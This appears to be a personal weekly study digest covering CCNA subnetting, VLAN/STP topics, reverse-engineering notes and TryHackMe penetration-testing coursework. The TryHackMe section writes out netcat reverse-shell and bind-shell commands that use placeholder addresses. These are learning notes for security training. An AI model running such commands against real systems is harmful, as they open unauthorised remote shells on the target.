CW06 Weekly Digest

Table of Contents

As usual, listing my collection of materials for the current week. Today’s digest contains collections for CW5 and CW6.

CCNA Progress

Subnetting

I’ve started with the subnetting practice. It’s where you have to divide the network into subnets with CIDR notation. Basically, I have to calculate the network address, broadcast address, and first and last useful address.

How to track Subnetting progress

I’ll add a progress table and tips and tricks soon. Noted this in my Todo list :)

Cisco Progress

Currently, I’m on day 20, which is a bit below my expectations. But the topics are getting complicated and I need some time to process them. Also, here I want to remind myself that I wanted to take this course from the programmer perspective, so it’s more important to answer questions, which I have them rush through the material with the target audience - system administrators or net engineers.

Topics: VLAN, STP

GNS3 real lab simulator

Setup simulator here. I haven’t built any lab with it yet. But sounds interesting.

Questions

Q1: Investigate IPv4 header fields. Main interest - Flags (see THM) and Fragmentation.
Q2: Why max Ethernet MTU - 1500? Find RFC
Q3: Windows has an interface to set up VLAN ID. Is it related to 802.1Q?

Reverse engineering

  • calling conventions
  • stack padding
  • Microsoft shadow store
  • Different registers that are used for parameters and return values

Will do articles for each. Actually, I need to dig more into this topic. I kinda skimmed them, but I want deeper knowledge.

Q: What assembler is used in Raspberry Pi, xv6 and M1? Are they similar? Can I use xv6 and say that I know ARM asm?

TryHackMe

JR Penetration tester

  • Metasploit console
  • Red team frameworks link link

Reverse shell

// On the attacking machine
sudo nc -lvnp 443

//On the target
nc <ip> <port> -e /bin/bash
  • -l is used to tell netcat that this will be a listener
  • -v is used to request a verbose output
  • -n tells netcat not to resolve host names or use DNS.
  • -p indicates that the port specification will follow.

Bind shell

//On the target
nc -lvnp <port> -e "cmd.exe"

//On the attacking machine
nc <ip> <port>

Posted articles

On learning process
Reverse engineering strategy

What Makes for a Successful Protocol?

Ideas

  • How to conduct monthly self-retrospectives link link
  • IT character as s character in DnD link